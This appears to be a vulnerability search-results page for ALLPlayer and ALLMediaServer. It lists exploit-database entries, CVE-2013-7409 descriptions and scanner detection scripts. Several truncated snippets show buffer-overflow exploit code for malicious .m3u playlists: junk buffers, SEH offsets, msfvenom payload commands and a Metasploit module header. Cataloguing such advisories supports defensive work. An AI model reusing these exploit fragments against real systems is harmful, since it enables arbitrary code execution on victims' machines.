60 matches found
ALLMediaServer 0.95 - Buffer Overflow Exploit
Exploit for windows platform in category dos / poc Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier CVE: CVE-2017-17932 Date: 27-12-2017 Exploit Author: Aloyce J. Makalanga Contact: https://twitter.com/aloycemjr Vendor Homepage: http://www.allmediaserver.org/ Category:...
ALLPlayer 7.5 - Denial of-Service (PoC)
!/usr/bin/python buffer = b"http://" buffer += b"\x41" 1500 f=open"player.m3u","wb" f.writebuffer f.close...
ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)
ALLPlayer 7.5 - Local Buffer Overflow SEH Unicode !/usr/bin/python Tested on: Windows 10 Professional x86 Exploit for previous version: https://www.exploit-db.com/exploits/42455/ Seems they haven't patched the vulnerability at all :D msfvenom -p windows/exec CMD="calc.exe" -e x86/unicodemixed...
ALLPlayer 7.4 - Buffer Overflow (SEH Unicode) Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: ALL Player v7.4 SEH Buffer Overflow Unicode Version: 7.4 Date: 15-08-2017 Exploit Author: f3ci Tested on: Windows 7 SP1 x86 head = "http://" seh = "\x0f\x47" 0x0047000f nseh = "\x61\x41" popad align junk =...
ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)
ALLPlayer 7.4 - Local Buffer Overflow SEH Unicode !/usr/bin/python Exploit Title: ALL Player v7.4 SEH Buffer Overflow Unicode Version: 7.4 Date: 15-08-2017 Exploit Author: f3ci Tested on: Windows 7 SP1 x86 head = "http://" seh = "\x0f\x47" 0x0047000f nseh = "\x61\x41" popad align junk = "\x41" 30...
ALLPlayer 7.4 Buffer Overflow
!/usr/bin/python Exploit Title: ALL Player v7.4 SEH Buffer Overflow Unicode Version: 7.4 Date: 15-08-2017 Exploit Author: f3ci Tested on: Windows 7 SP1 x86 head = "http://" seh = "\x0f\x47" 0x0047000f nseh = "\x61\x41" popad align junk = "\x41" 301 junk2 = "\x41" 45 msfvenom -p windows/shellbindt...
ALLPlayer M3U File Stack Buffer Overflow (CVE-2013-7409)
A stack buffer overflow vulnerability exists in ALLPlayer. The vulnerability is due to insufficient bounds checking on a M3U file. A remote attacker could exploit this vulnerability by enticing a victim to open a specially crafted M3U file. Successful exploitation could lead to arbitrary code...
ALLPlayer-5.8.1-(.m3u)-
Exploit Title: ALLPlayer 5.8.1 - .m3u Buffer Overflow SEH Date: Mar 1 2014 Exploit Author: Gabor Seljan Software Link: http://www.allplayer.org/download/allplayer Version: 5.8.1 use strict; use warnings; my $filename = "sploit.m3u"; my $junk1 = "\x41" x 301; Offset to SEH my $nSEH = "\x61\x50";...
ALLPlayer Detection (Windows SMB Login)
This script detects the installed version of ALLPlayer. The script logs in via smb, searches for ALLPlayer in the registry and gets the version from registry or file. SPDX-FileCopyrightText: 2014 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C...
ALLPlayer Buffer Overflow Vulnerability (Nov 2014) - Windows
ALLPlayer is prone to a buffer overflow vulnerability. SPDX-FileCopyrightText: 2014 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:allplayer:allplayer";...
CVE-2013-7409
Buffer overflow in ALLPlayer 5.6.2 through 5.8.1 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via a long string in a .m3u playlist file...
Buffer overflow
Buffer overflow in ALLPlayer 5.6.2 through 5.8.1 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via a long string in a .m3u playlist file...
CVE-2013-7409
Buffer overflow in ALLPlayer 5.6.2 through 5.8.1 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via a long string in a .m3u playlist file...
CVE-2013-7409
AllPlayer is affected by a stack-based buffer overflow (CVE-2013-7409) exploitable via a long string in an M3U playlist. Victims using ALLPlayer versions 5.6.2 through 5.8.1 are at risk; an attacker could deliver a specially crafted M3U file to trigger a crash and potentially execute arbitrary co...
ALLPlayer 2.8.1 M3U 缓冲区溢出漏洞
No description provided by source...
ALLPlayer 5.7 (.m3u) - SEH Buffer Overflow (Unicode)
No description provided by source. !/usr/bin/perl Exploit Title: ALLPlayer 5.7 .m3u - SEH Buffer Overflow Unicode Date: 11-23-2013 Exploit Author: Mike Czumak Tv3rn1x -- @SecuritySift Vulnerable Software: ALLPlayer 5.7 Software Link: http://www.allplayer.org/download/allplayer Version: 5.7 Tested...
ALLPlayer 5.8.1 - (.m3u file) Buffer Overflow (SEH)
No description provided by source...
ALLPlayer 5.6.2 (.m3u) - Local Buffer Overflow PoC
No description provided by source. Title: ALLPlayer Local Buffer Overflow PoC UNICODE Vendor: http://www.allplayer.org/download/allplayer Date found: 09.10.2013 Date published: 09.10.2013 Platform: windows 7 German Bug: Buffer Overflow UNICODE ---------------------------- 1VERSIONS AFFECTED ----...
ALLPlayer 5.6.2 (.m3u) - Local Buffer Overflow (SEH/Unicode)
No description provided by source. !/usr/bin/perl Exploit Title: ALLPlayer 5.6.2 .m3u - SEH Buffer Overflow Unicode Date: 10-22-2013 Exploit Author: Mike Czumak Tv3rn1x -- @SecuritySift Vulnerable Software: ALLPlayer 5.6.2 Software Link: http://www.allplayer.org/download/allplayer Version: 5.6.2...
ALLPlayer M3U Buffer Overflow
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initializeinfo =...